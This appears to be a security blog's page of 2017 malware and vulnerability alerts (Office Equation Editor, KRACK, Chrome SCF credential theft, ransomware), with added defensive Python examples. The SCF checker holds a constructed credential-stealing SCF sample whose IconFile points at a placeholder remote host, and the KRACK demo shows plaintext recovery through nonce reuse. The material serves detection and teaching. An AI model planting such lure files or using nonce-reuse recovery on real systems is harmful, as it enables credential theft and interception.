This post is worthy of a BOLO. Fixed earlier this month in the Patch Tuesday updates is a bug that has existed in every version of Microsoft Office for years. This bug, CVE-2017-11882, exists in the Equation Editor, the component that allows users to enter mathematical formulas in Office documents. These formulas exist as OLE (Object Linking and Embedding) objects […]
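Because the vulnerable component is reached through an embedded OLE object, a quick triage question for any suspicious document is "does it carry an Equation Editor object at all?". The scanner below is an added example written for this page, not code from the original post or from Microsoft: it looks for the Equation Editor ProgID (`Equation.3`) and its CLSID `{0002CE02-0000-0000-C000-000000000046}` (the CLSID Microsoft's mitigation guidance for this bug refers to), both as raw bytes and as the hex text used inside an RTF `\objdata` group. The sample inputs are constructed, not real malware. A hit only means an Equation Editor object is present; a legitimate document with formulas triggers it too, so treat it as a reason to look closer, not a verdict.

```python
import re

# Microsoft Equation 3.0 (ProgID "Equation.3") CLSID, as referenced in
# Microsoft's mitigation advice for CVE-2017-11882.
EQUATION3_CLSID = "0002CE02-0000-0000-C000-000000000046"


def clsid_to_bytes(clsid: str) -> bytes:
    """Serialise a CLSID string the way it is stored inside an OLE stream:
    the first three fields little-endian, the last two as-is."""
    a, b, c, d, e = clsid.split("-")
    return (int(a, 16).to_bytes(4, "little")
            + int(b, 16).to_bytes(2, "little")
            + int(c, 16).to_bytes(2, "little")
            + bytes.fromhex(d) + bytes.fromhex(e))


EQUATION3_CLSID_BIN = clsid_to_bytes(EQUATION3_CLSID)

# Indicators: ProgID text (RTF \objclass, OLE CompObj streams), the binary
# CLSID (OLE compound-file streams), and the same bytes hex-encoded as they
# appear inside an RTF \objdata group (upper or lower case).
INDICATORS = [
    ("progid", re.compile(rb"Equation\.3")),
    ("clsid-bin", re.compile(re.escape(EQUATION3_CLSID_BIN))),
    ("clsid-hex", re.compile(EQUATION3_CLSID_BIN.hex().encode(), re.IGNORECASE)),
]


def scan_for_equation_objects(data: bytes):
    """Return a list of (indicator_name, byte_offset) hits, sorted by offset."""
    hits = []
    for name, pattern in INDICATORS:
        for m in pattern.finditer(data):
            hits.append((name, m.start()))
    return sorted(hits, key=lambda h: h[1])


# Constructed samples (not real malware): an RTF fragment that embeds an
# Equation.3 object (the objdata body is illustrative, not a faithful OLE1
# stream), and a plain text file with nothing of interest.
RTF_SAMPLE = (
    rb"{\rtf1{\object\objemb{\*\objclass Equation.3}"
    rb"{\*\objdata " + EQUATION3_CLSID_BIN.hex().encode() + rb"}}}"
)
CLEAN_SAMPLE = b"Quarterly report. No embedded objects here."

if __name__ == "__main__":
    for label, blob in (("rtf", RTF_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(label, scan_for_equation_objects(blob))
```

Run it over a directory of inbound attachments and escalate any file that hits; the `clsid-bin` indicator is the one that fires on native .doc/.xls compound files, while `progid` and `clsid-hex` cover RTF.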
BOLOs
BOLO: IcedID Banking Trojan/Emotet Trojan
A new banking trojan called IcedID is hitting businesses throughout the US and Canada. In most cases IcedID is being bundled with another trojan called Emotet and delivered via spam email carrying infected Word documents. What makes IcedID unusual is that it propagates through a business network on its own. It sets up a Command and Control channel […]
BOLO: WPA2 WiFi KRACKed. Ouch!
Perhaps a more apropos title would be: When a “Nonce” is not enough! Holy cow, Batman, we’re in for a bumpy ride. The WPA2 protocol is vulnerable to a newly disclosed attack called Key Reinstallation AttaCK (KRACK). It affects both client devices and access points (routers), because it targets the handshakes that both sides perform. A “nonce” is a number that is meant to be used only once, often generated in a pseudo-random fashion […]
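The damage KRACK does comes from forcing a nonce to be reused with the same key, which makes a counter-mode cipher such as WPA2's CCMP emit the same keystream twice. The script below is an added example written for this page, not code from the original post or from the KRACK researchers, and it does not implement WPA2 or AES-CCMP: it uses an HMAC-SHA256 counter-mode keystream as a stand-in (an assumption made so the example runs with the standard library alone), because the nonce-reuse property is identical for any stream cipher. The two "frames" are constructed sample plaintexts.

```python
import hmac
import hashlib


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream: block i = HMAC-SHA256(key, nonce || i).
    Stand-in for CCMP's AES-CTR; the same (key, nonce) always yields the same bytes."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """Stream encryption: ciphertext = plaintext XOR keystream.
    Decryption is the same call with the ciphertext as input."""
    return xor(plaintext, keystream(key, nonce, len(plaintext)))


def recover_from_nonce_reuse(c1: bytes, known_p1: bytes, c2: bytes) -> bytes:
    """If c1 and c2 were produced under the same key AND the same nonce, the
    keystream cancels: c1 XOR c2 == p1 XOR p2.  Knowing p1 (e.g. a predictable
    protocol header) therefore reveals p2, up to the length of the shorter frame."""
    return xor(xor(c1, c2), known_p1)


# Constructed demo values: a fixed session key and two frames, the first with
# content an attacker could guess (an HTTP request line).
KEY = bytes.fromhex("00" * 16 + "ff" * 16)
NONCE = b"\x00\x00\x00\x00\x00\x01"          # packet-number style counter
FRAME1 = b"GET /index.html HTTP/1.1\r\n"
FRAME2 = b"Cookie: session=s3cr3t!!\r\n"


def demo() -> dict:
    c1 = encrypt(KEY, NONCE, FRAME1)
    reused = encrypt(KEY, NONCE, FRAME2)                  # nonce reinstalled
    fresh = encrypt(KEY, b"\x00\x00\x00\x00\x00\x02", FRAME2)  # nonce advanced
    return {
        "recovered_after_reuse": recover_from_nonce_reuse(c1, FRAME1, reused),
        "recovered_with_fresh_nonce": recover_from_nonce_reuse(c1, FRAME1, fresh),
    }


if __name__ == "__main__":
    for label, value in demo().items():
        print(f"{label}: {value!r}")
```

The second result is garbage because the keystreams differ; the first is the second frame's plaintext in full. That is why the fix for KRACK is not a new cipher but a client/AP patch that refuses to reinstall an already-in-use key, and why the page's advice to patch both sides holds.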
BOLO: Defray Ransomware
Proofpoint has identified a new type of ransomware called “Defray”. Two highly targeted ransomware attacks have been directed at the Healthcare and Education sectors, and another at the Manufacturing and Technology sectors. As Proofpoint points out, the attack is not of the “spray and pray” variety like most other ransomware campaigns. This suggests a very specific threat actor. […]
BOLO: PowerPoint Order/Invoice Exploit
This is another Office document infection that occurs without using macros. The malware delivered by this exploit is called “Zusy” and it targets Microsoft PowerPoint. The infection is triggered when the mouse pointer is moved over (mouse-over) a hyperlink in the slide. The hyperlink’s mouse-over action launches PowerShell, which fetches and installs the malware. When the user opens […]
BOLO: FireBall Browser Malware
Check Point Software Technologies reported an outbreak of browser-hijacking malware called “FireBall”. This malware delivers unwanted ads and pop-ups and takes full control of your web browsers (home page, default search engine and settings). It was created by the Chinese digital-marketing company “Rafotech”. FireBall is installed as a bundled component of other, legitimate-looking programs downloaded from the Internet. However, it has a great deal […]
BOLO: Chrome Spreads Your Creds!
A vulnerability in the current version of Google’s Chrome browser can allow your Windows login, or network login, credentials to be harvested by a remote attacker. The problem occurs because Chrome will automatically download a seemingly harmless .SCF file without prompting. These files are very much like the .LNK shortcut files of old. SCF stands […]
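What makes a downloaded .SCF file dangerous is its `IconFile=` entry: if it points at a UNC path on a host the attacker controls, Windows Explorer fetches the icon the moment the Downloads folder is opened and, in doing so, offers the user's credentials to that host. The checker below is an added example written for this page, not code from the original post or from the researchers who reported the bug. It parses the INI-style .SCF layout and flags any `IconFile` that references a remote host not on a trusted list; the two sample files are constructed (the `203.0.113.7` address is a documentation-range placeholder), and the `trusted_hosts` allow-list is an assumed parameter so the same check can be tuned for an environment with legitimate network icon shares.

```python
import ipaddress
import re

# Constructed samples. The first mimics the credential-stealing pattern: the
# icon lives on an attacker-controlled UNC path. The second is a normal
# "Show Desktop" SCF that points at a local system DLL.
MALICIOUS_SCF = (
    "[Shell]\r\nCommand=2\r\nIconFile=\\\\203.0.113.7\\share\\icon.ico\r\n"
    "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
)
BENIGN_SCF = (
    "[Shell]\r\nCommand=2\r\nIconFile=%SystemRoot%\\system32\\SHELL32.dll,3\r\n"
    "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
)

# Matches \\host\... or //host/... and captures the host part.
UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)")


def parse_scf(text: str) -> dict:
    """Minimal INI-style parse: {section: {key: value}}, keys lower-cased.
    Tolerates a UTF-8 BOM, CRLF line endings, blank lines and ';' comments."""
    sections, current = {}, None
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def analyse_scf(text: str, trusted_hosts=()) -> dict:
    """Flag an SCF whose IconFile points at a host outside trusted_hosts."""
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    path = icon.rsplit(",", 1)[0] if "," in icon else icon   # drop ",<icon index>"
    match = UNC_RE.match(path)
    host = match.group(1) if match else None
    try:
        is_ip_literal = host is not None and ipaddress.ip_address(host) is not None
    except ValueError:
        is_ip_literal = False
    trusted = {h.lower() for h in trusted_hosts}
    suspicious = host is not None and host.lower() not in trusted
    return {
        "icon_file": icon,
        "remote_host": host,
        "ip_literal": is_ip_literal,
        "suspicious": suspicious,
        "reason": ("IconFile fetched from untrusted remote host; opening the folder "
                   "will send NTLM credentials there") if suspicious else "",
    }


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SCF), ("benign", BENIGN_SCF)):
        print(label, analyse_scf(sample))
```

Point it at every `*.scf` under the browser's download directory; anything flagged should be deleted before the folder is opened in Explorer. Blocking outbound SMB (TCP 445) at the perimeter closes the same hole for hosts that have not yet been cleaned.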
BOLO: WannaCry(pt) RansomWare
First observed in February 2017, the WannaCry (WannaCrypt) ransomware is wreaking havoc in European networks. Major outbreaks of a new variant were first detected on Friday, 5/12/2017 in Spain, but it has since spread to over 99 countries. It also crippled large parts of England’s National Health Service (NHS). Contrary to first reports, the malware is not simply web-based: it spreads as a worm over SMB between unpatched Windows machines, not only from users clicking […]
BOLO: Netrepser Espionage Trojan
Netrepser is a JavaScript (JavaScript ≠ Java) trojan designed for espionage. It was detected and reported by Bitdefender on May 5, 2017. Believed to be of Russian origin, the trojan is commonly distributed by email. However, its JavaScript nature suggests it may also be able to infect victims through web-based “drive-by download” […]
BOLO: New “Jaff” RansomWare
Yesterday, May 11, 2017, a new type of ransomware called “Jaff” was released. It is spread by the Necurs botnet using email as the transmission medium. Considering last week’s exploits of Google Gmail accounts, I suspect this will eventually migrate to appear as emails from legitimate friends. Beware of any emails with the subject lines […]